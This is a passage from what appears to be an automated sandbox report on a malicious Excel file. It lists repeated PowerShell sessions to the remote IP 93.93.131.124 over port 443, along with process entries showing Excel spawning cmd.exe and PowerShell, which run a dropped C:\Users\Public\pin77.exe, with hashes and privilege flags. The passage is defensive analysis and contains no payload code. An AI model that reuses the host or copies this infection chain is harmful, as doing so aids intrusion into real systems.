| 37 | 192.168.2.3 | 49751 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:11:47 UTC | 1595 | OUT | |
| 2022-12-04 11:11:47 UTC | 1595 | IN | |
| 2022-12-04 11:11:47 UTC | 1595 | IN | |
| 2022-12-04 11:11:47 UTC | 1603 | IN | |
| 2022-12-04 11:11:47 UTC | 1611 | IN | |
| 2022-12-04 11:11:47 UTC | 1619 | IN | |
| 2022-12-04 11:11:47 UTC | 1626 | IN | |
| 2022-12-04 11:11:47 UTC | 1634 | IN | |
| 2022-12-04 11:11:47 UTC | 1642 | IN | |
| 2022-12-04 11:11:47 UTC | 1650 | IN | |
| 2022-12-04 11:11:47 UTC | 1658 | IN | |
| 2022-12-04 11:11:47 UTC | 1665 | IN | |
| 2022-12-04 11:11:47 UTC | 1673 | IN | |
| 2022-12-04 11:11:47 UTC | 1681 | IN | |
| 2022-12-04 11:11:47 UTC | 1689 | IN | |
| 2022-12-04 11:11:47 UTC | 1697 | IN | |
| 2022-12-04 11:11:47 UTC | 1704 | IN | |
| 2022-12-04 11:11:47 UTC | 1712 | IN | |
| 2022-12-04 11:11:47 UTC | 1720 | IN | |
| 2022-12-04 11:11:47 UTC | 1728 | IN | |
| 2022-12-04 11:11:47 UTC | 1736 | IN | |
| 2022-12-04 11:11:47 UTC | 1744 | IN | |
| 2022-12-04 11:11:47 UTC | 1751 | IN | |
| 2022-12-04 11:11:47 UTC | 1759 | IN | |
| 2022-12-04 11:11:47 UTC | 1767 | IN | |
| 2022-12-04 11:11:47 UTC | 1775 | IN | |
| 2022-12-04 11:11:47 UTC | 1783 | IN | |
| 2022-12-04 11:11:47 UTC | 1790 | IN | |
| 2022-12-04 11:11:47 UTC | 1798 | IN | |
| 2022-12-04 11:11:47 UTC | 1806 | IN | |
| 2022-12-04 11:11:47 UTC | 1814 | IN | |
| 2022-12-04 11:11:47 UTC | 1822 | IN | |
| 2022-12-04 11:11:47 UTC | 1829 | IN | |
| 2022-12-04 11:11:47 UTC | 1837 | IN | |
| 2022-12-04 11:11:47 UTC | 1845 | IN | |
| 2022-12-04 11:11:47 UTC | 1853 | IN | |
| 2022-12-04 11:11:47 UTC | 1861 | IN | |
| 2022-12-04 11:11:47 UTC | 1869 | IN | |
| 2022-12-04 11:11:47 UTC | 1876 | IN | |
| 2022-12-04 11:11:47 UTC | 1884 | IN | |
| 2022-12-04 11:11:47 UTC | 1892 | IN | |
| 2022-12-04 11:11:47 UTC | 1900 | IN | |
| 2022-12-04 11:11:47 UTC | 1908 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 38 | 192.168.2.3 | 49753 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:12:23 UTC | 1915 | OUT | |
| 2022-12-04 11:12:23 UTC | 1916 | IN | |
| 2022-12-04 11:12:23 UTC | 1916 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 39 | 192.168.2.3 | 49754 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:12:23 UTC | 1916 | OUT | |
| 2022-12-04 11:12:23 UTC | 1916 | IN | |
| 2022-12-04 11:12:23 UTC | 1917 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 4 | 192.168.2.3 | 49704 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:12 UTC | 1452 | OUT | |
| 2022-12-04 11:06:12 UTC | 1452 | IN | |
| 2022-12-04 11:06:12 UTC | 1453 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 40 | 192.168.2.3 | 49755 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:12:59 UTC | 1924 | OUT | |
| 2022-12-04 11:12:59 UTC | 1924 | IN | |
| 2022-12-04 11:12:59 UTC | 1925 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 41 | 192.168.2.3 | 49756 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:13:00 UTC | 1925 | OUT | |
| 2022-12-04 11:13:00 UTC | 1925 | IN | |
| 2022-12-04 11:13:00 UTC | 1925 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 42 | 192.168.2.3 | 49757 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:13:34 UTC | 1933 | OUT | |
| 2022-12-04 11:13:34 UTC | 1933 | IN | |
| 2022-12-04 11:13:34 UTC | 1934 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 43 | 192.168.2.3 | 49758 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:13:35 UTC | 1934 | OUT | |
| 2022-12-04 11:13:35 UTC | 1934 | IN | |
| 2022-12-04 11:13:35 UTC | 1934 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 44 | 192.168.2.3 | 49759 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:14:11 UTC | 1942 | OUT | |
| 2022-12-04 11:14:11 UTC | 1942 | IN | |
| 2022-12-04 11:14:11 UTC | 1942 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 45 | 192.168.2.3 | 49760 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:14:11 UTC | 1943 | OUT | |
| 2022-12-04 11:14:11 UTC | 1943 | IN | |
| 2022-12-04 11:14:11 UTC | 1943 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 46 | 192.168.2.3 | 49761 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:14:52 UTC | 1951 | OUT | |
| 2022-12-04 11:14:52 UTC | 1951 | IN | |
| 2022-12-04 11:14:52 UTC | 1951 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 47 | 192.168.2.3 | 49762 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:14:52 UTC | 1952 | OUT | |
| 2022-12-04 11:14:52 UTC | 1952 | IN | |
| 2022-12-04 11:14:52 UTC | 1952 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 5 | 192.168.2.3 | 49705 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:12 UTC | 1453 | OUT | |
| 2022-12-04 11:06:12 UTC | 1453 | IN | |
| 2022-12-04 11:06:12 UTC | 1453 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 6 | 192.168.2.3 | 49706 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:20 UTC | 1461 | OUT | |
| 2022-12-04 11:06:20 UTC | 1461 | IN | |
| 2022-12-04 11:06:20 UTC | 1462 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 7 | 192.168.2.3 | 49707 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:20 UTC | 1462 | OUT | |
| 2022-12-04 11:06:20 UTC | 1462 | IN | |
| 2022-12-04 11:06:20 UTC | 1462 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 8 | 192.168.2.3 | 49708 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:28 UTC | 1470 | OUT | |
| 2022-12-04 11:06:28 UTC | 1470 | IN | |
| 2022-12-04 11:06:28 UTC | 1470 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 9 | 192.168.2.3 | 49709 | 93.93.131.124 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2022-12-04 11:06:28 UTC | 1471 | OUT | |
| 2022-12-04 11:06:28 UTC | 1471 | IN | |
| 2022-12-04 11:06:28 UTC | 1471 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 0 |
| Start time: | 12:05:47 |
| Start date: | 04/12/2022 |
| Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2e0000 |
| File size: | 27110184 bytes |
| MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 1 |
| Start time: | 12:05:50 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 2 |
| Start time: | 12:05:51 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 3 |
| Start time: | 12:05:51 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Reputation: | high |
| Target ID: | 4 |
| Start time: | 12:05:58 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 5 |
| Start time: | 12:05:59 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 6 |
| Start time: | 12:05:59 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Reputation: | high |
| Target ID: | 9 |
| Start time: | 12:06:05 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 10 |
| Start time: | 12:06:06 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 11 |
| Start time: | 12:06:06 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 12 |
| Start time: | 12:06:14 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Antivirus matches: |
|
| Target ID: | 13 |
| Start time: | 12:06:14 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 15 |
| Start time: | 12:06:14 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 16 |
| Start time: | 12:06:15 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 18 |
| Start time: | 12:06:22 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 19 |
| Start time: | 12:06:23 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 20 |
| Start time: | 12:06:23 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 21 |
| Start time: | 12:06:23 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 25 |
| Start time: | 12:06:29 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 28 |
| Start time: | 12:06:34 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 29 |
| Start time: | 12:06:34 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff68f300000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 30 |
| Start time: | 12:06:34 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 31 |
| Start time: | 12:06:40 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 32 |
| Start time: | 12:06:47 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 33 |
| Start time: | 12:06:47 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 34 |
| Start time: | 12:06:47 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 35 |
| Start time: | 12:06:51 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 36 |
| Start time: | 12:07:04 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 37 |
| Start time: | 12:07:04 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 38 |
| Start time: | 12:07:05 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 39 |
| Start time: | 12:07:09 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 40 |
| Start time: | 12:07:20 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 41 |
| Start time: | 12:07:20 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 42 |
| Start time: | 12:07:21 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 43 |
| Start time: | 12:07:26 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 45 |
| Start time: | 12:07:30 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Target ID: | 46 |
| Start time: | 12:07:37 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 47 |
| Start time: | 12:07:37 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 48 |
| Start time: | 12:07:37 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 49 |
| Start time: | 12:07:44 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 50 |
| Start time: | 12:07:56 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 51 |
| Start time: | 12:07:56 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 52 |
| Start time: | 12:07:57 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x20000 |
| File size: | 430592 bytes |
| MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | .Net C# or VB.NET |
| Target ID: | 54 |
| Start time: | 12:08:02 |
| Start date: | 04/12/2022 |
| Path: | C:\Users\Public\pin77.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x2f0000 |
| File size: | 1477416 bytes |
| MD5 hash: | AEB47B393079D8C92169F1EF88DD5696 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 55 |
| Start time: | 12:08:16 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xb0000 |
| File size: | 232960 bytes |
| MD5 hash: | F3BDBE3BB6F734E357235F4D5898582D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 56 |
| Start time: | 12:08:17 |
| Start date: | 04/12/2022 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff745070000 |
| File size: | 625664 bytes |
| MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 57 |
| Start time: | 12:08:17 |
| Start date: | 04/12/2022 |
